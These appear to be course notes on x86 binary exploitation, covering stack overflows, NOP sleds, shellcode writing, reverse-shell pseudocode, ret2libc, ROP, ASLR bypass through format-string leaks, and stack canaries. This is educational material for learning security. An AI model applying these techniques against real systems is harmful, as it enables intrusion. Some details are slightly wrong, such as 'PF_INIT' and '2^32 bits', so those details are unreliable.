Contents
- Basic Concepts
- ELF (9/10)
- C Language (9/10)
- Memory (9/15)
- Processes Address Space (9/15)
- Process Execution (9/15)
- Registers (9/17)
- x86 Instructions (9/24)
- Exploitation Tools (9/24)
- Control-Flow Hijacking (9/22)
- Code Injection
- NOP Sled (9/29)
- jmp %esp (9/29)
- Register Spring (9/29)
- Shellcode Development
- Shellcode (10/1)
- Writing Shellcode (10/1)
- Reverse Shell (10/6)
- Non-Executable Memory | Code Reuse
- Non-Executable Memory (10/8)
- mprotect (10/8)
- system (10/15)
- ret2libc Chain (10/15)
- Partial ASLR | Return-Oriented Programming
- Address Space Layout Randomization (10/20)
- Dynamic Linking (10/27)
- Return-Oriented Programming (10/27)
Basic Concepts
ELF
An ELF is an executable, linkable, binary format. It is standard for UNIX-like systems.
An ELF file can represent executables, shared/static library, object files, and core dumps.
- An executable (EXEC) is a library with a main function
- An object file (REL) is a compiled C file that is not liked yet
- A static library is statically linked in, which means that it is included as a big blob in the executable
- A dynamic shared library (DYN) is linked in and has relative addresses (e.g.
libc)
ELF file contents:
- The header contains metadata about the file, such as the type of file (executable, shared library, etc.), the architecture it is intended for, and the entry point address.
- The section header table describes the sections in the file, such as:
.text: executable code.data: initialized global data.bss: uninitialized global data.rodata: read-only global data, such as string literals
- The program header table describes the segment, which are loaded into memory when the program is run. Segments can contain multiple sections.

readelf is a useful utility for examining the contents of ELF files. Run it when readelf -e file.
C Language
C compilation process:
- The C preprocessor takes the source code (.c) and preprocesses it by inserting the contents of header files (
#include), expanding macros (#define), and handling conditional compilation directives (#if,#else). This becomes an intermediate file (.i). - The C compiler takes the intermediate file and converts it to architecture-specific assembly (.s). It takes it from the AST (GENERIC), to the next IR (GIMPLE), then to the SSA (single static analysis), and finally to the assembly code.
- The assembler takes the assembly file, converts the assembly to machine code, and produces an object file (.o).
- The linker takes one or more object files and combines them into a single executable file.
- The loader loads the executable into memory and prepares it for execution. It sets up the necessary memory segments, resolves dynamic links (if any), and transfers control to the program's entry point (usually the
mainfunction).
Note that in this process, the object files and the final executable are ELF files.
C constructs:
externmeans external to the compilation unitstaticmeans internal to the compilation unit, so you cannot access it from other compilation units
C data types:
| Type | Size | Value |
|---|---|---|
void | N/A | No value |
char | 1 byte | Character |
short | 2 bytes | Whole number |
int | 4 bytes | Whole number |
long | 4 bytes* | Whole number |
long long | 8 bytes* | Whole number |
float | 4 bytes | Decimal number |
double | 8 bytes | Decimal number |
long double | 16 bytes | Decimal number |
pointer | 4 bytes* | Address |
*This is based on a 32-bit architecture. On a 64-bit architecture, long and pointer would typically be 8 bytes.
References:
Memory
Memory can be referenced using its address, whose granularity and size depends on the architecture. In x86, every 8 bits (1 byte) of memory has its own address. In 32-bit systems, the address is 32 bits (4 bytes) long, and in 64-bit systems, the address is 64 bits (8 bytes) long.
This means that in x86 32-bit systems, there is roughly 2^32 bits = 4 GB of addressable memory. Around 1 GB is dedicated to the kernel and 3 GB is dedicated to userland.

Memory is allocated by the kernel. The granularity of allocatable memory is also dependent on the architecture. Linux allocates memory in pages, which are typically 4 KB in size. The reason why this is important is because permission bits can only be set at the page level.
Virtual addresses are used for both resource management and process isolation. To translate from virtual addresses to physical addresses, page tables are managed by the operating system and assigned to each process. The hardware accesses this through the TLB (translation lookahead buffer).
TLDR: Addressable memory has a granularity of 1 byte, but allocatable memory has a granularity of 4 KB.
Process Address Space
A process is a running instance of a program. Each process has its own virtual address space. There is 1 GB dedicated to kernel mappings and 3 GB dedicated to userland.
The stack grows from high addresses to low addresses, but data structures inside of the stack are read from low addresses to high addresses. The heap grows from low addresses to high addresses.
The mmap region is the only region with DYN (dynamically linked) memory. It also has its own mmap heap.

Process Execution
The operating system reads the ELF file and does the following:
- Calculate the number of pages needed for the process
- Carve the address space into page-aligned segments with permissions
- Copy allocatable bytes from the ELF file into the address space
- If there is no INTERP statement, jump to the entry point of the main ELF file.
- If there is an INTERP statement, copy the new ELF file into the MMAP region and jump to its entry point.
From then on, the operating system is done.
The INTERP statement is used to describe the binary's dependencies in dynamically-loaded libraries. For the main ELF file, the INTERP will read like this: [Requesting program interpreter: /lib/ld-linux.so.2].
ld.so is a special helper that will help load all other libraries into memory. Similar to the operating system, ld.so will jump to the right place in the MMAP region of memory and copy the relevant dynamically-loaded library, like libc.so.
Registers
x86 has 8 general-purpose registers (EAX, EBX, ECX, ESI, EDI, EBP, and ESP) and two special-purpose registers (EFLAGS, EIP).
- %eip points at the next instruction to be executed
- %esp points at the top of the stack
- %eax contains the return value of functions
- %ebp points at the base of the current stack frame

x86 Instructions
The x86 instruction set (ISA) is variable length, which makes it more difficult to decode instructions.
The ISA can be presented with either AT&T syntax or IA-32 ASM (Intel) syntax, but AT&T syntax is more common in UNIX-like systems.
e.g. mov %eax, %ebx in AT&T syntax is mov ebx, eax in Intel syntax.
| Symbol | Meaning |
|---|---|
| %eax | Register |
| $100 | Constant |
| 0x100 | Memory address |
| (%eax) | Memory address in the register |
| offset(base, index, multipler) | Memory address in offset + base + index * multiplier |
x86 uses little-endian format, which means that the least significant byte is stored at the lowest memory address.
Stack Frame
To initiate a function call, the caller makes a call <addr>, which:
- Computes the return address, or the address of the next instruction after the
call - Pushes the return address onto the stack in little endian
- Loads
%eipwith the call target<addr>
To set up the new stack frame, the callee has a prologue (enter), which:
- Pushes the old
%ebponto the stack - Sets the base pointer to the current top of the stack
- Grows the stack down to allocate space for local variables
push %ebp
mov %esp,%ebp
sub $0x218,%esp
To remove a stack frame, the callee has an epilogue (leave), which:
- Copies
%ebpto%esp - Pops the saved ebp from the stack back into
%ebp
mov %ebp, %esp
pop %ebp
To transfer control back to the caller, the callee makes a ret, which:
- Pops the return address from the top of the stack
- Loads
%eipwith the return address - Resumes execution at the new
%eipvalue

Parameters and local variables are referenced relative to the base pointer %ebp. Positive offsets means that you are accessing parameters and negative offsets means that you are accessing local variables. For example, -0xc(%ebp) means that there is a local variable 12 bytes from %ebp.
Parameters are pushed onto the stack in reverse order. For example, the read function takes 3 parameters: int fd, void* buf, and size_t nbytes. The assembly code to call read(4, buf, 0x40) looks like this:
push $0x40
lea -0x18(%ebp),%eax
push %eax
push $0x0
lea is the only instruction that does not dereference the address. It just load the address into a register.
Exploitation Tools
Terminal commands
as --32 program.s -o program.oassembles in 32-bit.cc -m32 program.c -o programcompiles in 32-bit.lddprints the shared libraries required by each program.objdump -d <exec>disassembles executable files.readelf -s <file>ornm <file>lists symbols from object files.
GDB
info proc mappingsprints the memory mappings of the current processdisassemble maindisassembles the main functionb *addrsets a breakpoint at the given addresssisteps one instructionprintf "%x\n", $ebp+0x8prints addressesx/x bffffdb0examines memoryx/i systemexamines memory as instructions
Control-flow hijacking
Control-flow hijacking is the exploitation of memory vulnerabilities to change the control flow of a program.
This is commonly done using stack buffer overflows. The stack contains return addresses that are automatically pushed by the CPU during a call. Control data can easily be manipulated by changing the return addresses.
Code Injection
Stack jitter refers to how much the stack memory location changes across instances because of environment variables and commandline arguments placed on the top of the process address space. This causes problems with hardcoding addresses in the return address.
This problem can be mitigated by NOP sleds and jmp %esp.
NOP Sled
NOP sleds are sequences of NOP instructions (0x90) that slide the execution flow to the shellcode. NOP sleds allow the exploit to compensate for the fact that the shellcode may land in slightly different addresses due to different environment variables. But it does not entirely mitigate stack jitter because you still need to guess the address of the NOP landing pad, which is a specific stack address.

jmp %esp
In the jmp %esp technique, the return address is overwritten with an address to the instructions jmp %esp (ff e4). When ret is called, the %esp is decremented by 4 bytes and the return address is loaded into the %eip. At the next execution cycle, the %eip jumps to the top of the stack, where the shellcode is located. Note that the exploiter needs to be able to write beyond the return address.
This reliably mitigates stack jitter because there is no need to guess a specific stack address. It will always transfer control to the current location of the register.

Register Spring
A register spring uses any instruction that jumps to a register, such as jmp %eax or call %ebx. It is less constrained than jmp %esp.
This reliably mitigates stack jitter because it always transfers control to the location pointed by a specific register.
Shellcode Development
Shellcode
Shellcode is code that is injected into the attacker's area of control in order to exploit a memory corruption vulnerability.
Reverse shellcode connects back to the attacker's machine and gives the attacker a shell. Anything the attacker types is executed on the victim's machine; and anything the victim's machine outputs is sent back to the attacker.
Bind shellcode listens on a port and gives the attacker a shell when they connect to that port.
Writing Shellcode
Write the assembly. Assemble it. Then disassemble it to get the opcodes. A nice one-liner is as --32 program.s -o program && objdump -d program.
Each system call has a mapping between its arguments and registers. To make a system call, put its syscall number in %eax and its arguments in the appropriate registers. Then invoke int $0x80. The return value will be in %eax.
Avoid null bytes (0x00). They can terminate strings early in functions like strcpy().
Tricks to remove null bytes:
- Instead of
mov $0x0,xorregisters with themselves pushwcan sometimes optimize out00. e.g.pushw $0x0012is\x66\x6a\x12instead of\x66\x6a\x12\x00. This works for values up to7f.- Because
/bin/shis 7 bytes, there will be a null byte at the end. You can instead push/bin//sh.
It might also be necessary to reduce payload size.
Tricks to reduce shellcode size:
- In
mov, use the lowest register necessary
You can also look for strings in the .rodata section instead of pushing byte-by-byte
- Find the string in the binary with
strings -t x <file> | grep <string>
strings -t x exec | grep string
3008 string
-
Find the offset and address of
.rodatasection usingreadelf -S <file> | grep .rodatareadelf -S exec | grep .rodata [15] .rodata PROGBITS 0bf07000 003000 0001b2 00 A 0 0 4 -
Calculate the address of the string by summing address of the
.rodatasection with the offset of the string within.rodata.0bf07000 + (3008 - 3000) = 0bf07008
Reverse Shell
On the compromised machine, the shellcode:
- Creates a socket
- Changes stdin, stdout, and stderr to the socket
- Connects to the attacker's machine
- Executes
/bin/sh
sfd = socket(PF_INIT, SOCK_STREAM, 0);
dup2(sfd, 2); // stderr
dup2(sfd, 1); // stdout
dup2(sfd, 0); // stdin
connect(sfd, &sin, sizeof(sin));
execve("/bin/sh", NULL, NULL);
Non-Executable Memory | Code Reuse
Non-Executable Memory
Around the early 2000s, computers started to implement non-executable memory to mitigate code injection attacks. Pages now had 3 permission bits:
- Present (P)
- Read/write (R/W)
- Executable (X)
However, the return address can still be overwritten to point to existing code in the program or libraries. This exploit is called code reuse, ret2libc, or whole function reuse.
mprotect
mprotect is a function in libc that can set the protection on a region of memory.
- Add parameters for
mprotectto make the stack executable - Add shellcode where
mprotectwill return - Hijack the control flow to
mprotect
system
system is a function in libc that executes a string as a command.
- Add the string
/bin/shsomewhere in memory - Add the address of
/bin/shas a parameter tosystem - Hijack the control flow to
system
ret2libc Chain
We can also call multiple functions in a row through a ret2libc chain. At each link, we need to push:
- The arguments to the function
- The return address of the function
- The address of the function to call
The return address of the function should be a gadget that lifts the stack up to the next function and then calls ret.
If the function argument is a pointer, make sure that you don't put it in the stack region that will be overwritten by new stack frames.

Partial ASLR | Return-Oriented Programming
Address Space Layout Randomization
Address space layout randomization (ASLR) is a probabilistic defense that artificially randomizes the starting address space of parts of the address space.
Partial ASLR randomizes the stack, mmap, and heap. Full ASLR also randomizes the main executable.
Constraints:
- Stack needs to be 16 bit aligned (19 bits of entropy)
- mmap needs to be 4 KB aligned (8 bits of entropy)
- brk needs to be 4 KB aligned (13 bits of entropy)
Dynamic Linking
Dynamic linking
- Global offset table (GOT) contains of addresses of external functions and global variables
- Procedure linkage table (PLT) contains stubs that jump to the addresses in the GOT
Here is the process of calling an external function:
-
An external function in the
.textsection is called using the.pltstub.bf06327: e8 14 2d 14 fc call 8049040 <read@plt> -
The
.pltstub is a set of three instruction, which starts with a jump to an address in the GOT.08049040 <read@plt>: 8049040: ff 25 4c 84 f0 0b jmp *0xbf0844c 8049046: 68 08 00 00 00 push $0x8 804904b: e9 d0 ff ff ff jmp 8049020 <_init+0x20>If the function is being called for the first time, the GOT slot will just point to the next instruction in the PLT stub, which pushes the function index and jumps to the dynamic linker.
If the function has been called before, the GOT slot will point to the actual function address.
Only functions used in the binary have PLT stubs. PLT addresses are not randomized by partial ASLR because they are part of the main executable.
Return-Oriented Programming
A gadget is a sequence of instructions that ends with a ret. Return-oriented programming (ROP) involves chaining gadgets together to perform arbitrary computation. Often, this involves setting up the stack frame above the original return address.
To find unaligned gadgets, search for ret (c3) instructions. Then, backtrack a few bytes to find useful instructions. One tool to do this automatically is ROPgadget
For partial ASLR, we can use ROP to set up arguments, particularly if they are memory addresses. Then we can call functions in the PLT, which is not randomized.

Full ASLR | Just-In-Time Code Reuse
Full ASLR
Full ASLR randomizes the main executable in addition to everything that the partial ASLR randomizes. To have full ASLR, the main executable must not contain any absolute addresses; i.e. it must be position-independent code (PIC).
An executable with full ASLR is a DYN (Position-Independent Executable file). This is slightly different from library files, which are DYN (Shared object file).
Memory Disclosure
In format strings, %x will always print the last value from the stack and interpret it as a hexadecimal. This can be exploited to find the return address, creating a memory disclosure vulnerability.
printf("XXXX %x %x %x %x");
In practice, putting too many %x in the input string will result in overwriting the return address before we get to read it. Instead, we should use the %N$x notation to read specific stack locations.
printf("%138$x")
Just-In-Time Code Reuse
-
Get the return address through a memory disclosure vulnerability.
-
Calculate the base address of the main executable by subtracting the offset of the return address from the base address.
In other words,
base addr = return addr - offset. We can find this offset usinginfo proc mappingsin GDB. -
Calculate the addresses of gadgets and functions in the main executable
Note that gadgets must be taken from the main executable, not from libraries. Gadgets and functions will have fixed offsets from the base address, given by
readelf -e <executable>. -
Use a ROP chain to call functions in the PLT once again.

Note that GDB disables ASLR by default. To enable it, run set disable-randomization off.
Stack Canaries/Cookies
Stack Canaries
A stack canary is a tripwire defense against return address overwrites. In particular, it defends against contiguous spatial memory violations in the stack. This defense needs to be enabled by the compiler.
The canary is a random 4-byte value that is placed in the stack frame of the protected function. A master "copy" of the canary is placed somewhere effectively random in the heap. When the function returns, the epilogue checks that the canary in the stack frame matches the master copy. If the canary matches, we can assume that all values above the canary in the stack frame are intact.

Note that this defense is not effective if there is a memory disclosure vulnerability that allows the attacker to read the canary value.
x86 Segmentation
The memory management unit (MMU) has a segmentation unit and a paging unit. The segmentation unit takes physical memory, divides it into chunks (segments), and runs processes in separate segments. The global descriptor table (GDT) is a data structure in the kernel that contains a segment descriptor for each segment. The segment descriptor which describes the segment's base address and limit address.
There are six, 2-byte segment selectors in x86: %cs, %ds, %es, %fs, %gs, and %ss. These selectors can be used to index the GDT to get a particular segment selector. Every address that references the code segment uses the %cs selector. Every address that references the stack segment uses the %ss selector.
Specifically, the 13 most-significant bits in the registers are used for indexing into the GDT to get a segment selector. The 3rd bit is the table indicator (TI), which specifies whether to use the GDT (0) or the local descriptor table (LDT) (1). The 2 least-significant bits are the requested privilege level (RPL).
For example, the address below resolves to GDT[%fs].base + 0x00010203.
mov %fs:0x00010203, %eax
The nice thing about segmentation is that it is not possible to find the address of the segment base through memory disclosure vulnerabilities. This is because the segment base is stored in the GDT, which lives in kernel space and is only accessible through segment selectors.
References: